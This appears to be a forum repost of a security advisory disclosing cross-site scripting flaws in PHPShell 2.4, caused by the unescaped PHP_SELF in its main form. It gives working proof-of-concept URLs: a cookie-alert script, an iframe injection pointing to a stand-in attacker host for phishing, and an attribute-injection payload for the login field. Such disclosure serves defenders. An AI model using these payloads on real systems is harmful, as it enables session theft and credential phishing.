Jump to content
geeko

PHPShell 2.4 Cross Site Scripting

Recommended Posts

Posted
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-CROSS-SITE-SCRIPTING.txt
[+] ISR: ApparitionSec



Vendor:
==========
sourceforge.net/projects/phpshell/
phpshell.sourceforge.net/



Product:
=============
PHPShell v2.4


Vulnerability Type:
====================
Cross Site Scripting



CVE Reference:
==============
N/A



Security Issue:
================
Multiple cross site scripting entry points exist in PHPShell undermining
the integrity between users browser and server.
Allowing remote attackers to bypass access controls such as the same-origin
policy. If an authenticated user clicks an attacker
supplied link.

XSS issue is made possible because PHPShell calls print
$_SERVER['PHP_SELF'] on the main HTML form. Since PHP_SELF references URL,
PHPShell simply reads our XSS payload in the URL and echoes it back to
client.

<form name="shell" enctype="multipart/form-data" action="<?php
print($_SERVER['PHP_SELF']) ?>" method="post">

Since PHPShell purpose is to execute system commands this XSS vulnerability
can potentially become a 'Remote Command Execution'
vulnerability. Moreover, this XSS issue can also potentially leverage a
Session Fixation vulnerability also present in PHPShell.


Reference:
"
http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-SESSION-FIXATION.txt
"


Tested successfully in Firefox


Exploit/POC:
=============

XSS 1)

http://VICTIM-IP/phpshell-2.4/phpshell.php/%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

OR Inject IFRAME to phish and steal credentials, you get the idea.

http://VICTIM-IP/phpshell-2.4/phpshell.php/%22/%3E%3Cscript%3Evar%20frm=document.createElement('IFRAME');document.body.appendChild(frm);frm.setAttribute(%22width%22,%22900%22);frm.setAttribute(%22height%22,%22900%22);frm.src=%22http://ATTACKER-IP.com%22%3C/script%3E%3C!--



XSS 2) http://VICTIM-IP/phpshell-2.4/phpshell.php

On the Login Authentication HTML form 'username' input field

" onMousemove="alert(document.cookie)

enter a password and hit Enter.




Network Access:
===============
Remote



Severity:
=========
Medium



Disclosure Timeline:
===============================
Vendor Notification: No reply
In addition the INSTALL file "Bugs?  Comments?" Tracker System link is HTTP
404
http://sourceforge.net/tracker/?group_id=156638
February 18, 2017 : Public Disclosure

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...